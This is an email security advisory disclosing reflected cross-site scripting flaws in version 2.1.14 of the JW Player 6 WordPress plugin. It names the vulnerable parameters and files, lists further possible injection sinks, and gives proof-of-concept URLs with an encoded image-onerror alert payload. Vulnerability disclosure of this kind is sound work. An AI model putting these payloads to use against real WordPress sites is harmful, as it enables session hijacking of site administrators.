Subject: Cross-Site Scripting (XSS) in JW Player 6 Plugin for Wordpress 2.1.14
Date: Wed, 19 Aug 2015 11:47:41 +0200

Hello,

Plugin: JW Player 6 Plugin for Wordpress 2.1.14 https://wordpress.org/plugins/jw-player-plugin-for-wordpress/

1. Cross-Site Scripting (XSS) (Reflected)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: GET 
Url: http://localhost/wp-admin/upload.php?page=jwp6_playlists&playlist=[xss]
Vulnerable parameters: playlist, jwp6_playlists_playlist_select

Example PHP callstack:
/jw-player-plugin-for-wordpress/jwp6/jwp6-playlist-manager.php:301


Verification:
http://localhost/wp-admin/upload.php?page=jwp6_playlists&playlist=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


There are many other XSS in jwp6-playlist-manager.php, another example:

Method: GET 
Url: http://localhost/wp-admin/upload.php?page=jwp6_playlists&orderby=title&order=[xss]
Vulnerable parameters: order

Example PHP callstack:
/jw-player-plugin-for-wordpress/jwp6/jwp6-playlist-manager.php:365

Verification:
http://localhost/wp-admin/upload.php?page=jwp6_playlists&orderby=title&order=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


Other possible XSS:

FlashVarState::render   [/jw-player-plugin-for-wordpress/admin/FlashVarState.php:87] $_POST['jwplayermodule_value']
AdminState::selectedPlayer   [/jw-player-plugin-for-wordpress/admin/AdminState.php:55] $_POST['jwplayermodule_new_player']
PluginState::getFooter   [/jw-player-plugin-for-wordpress/admin/PluginState.php:202] $_POST['jwplayermodule_player_plugins']
LTASState::render   [/jw-player-plugin-for-wordpress/admin/LTASState.php:93] $_POST['jwplayermodule_plugin_ltas_cc']
PluginState::render   [/jw-player-plugin-for-wordpress/admin/PluginState.php:167]


--
Regards,
Marcin Probola,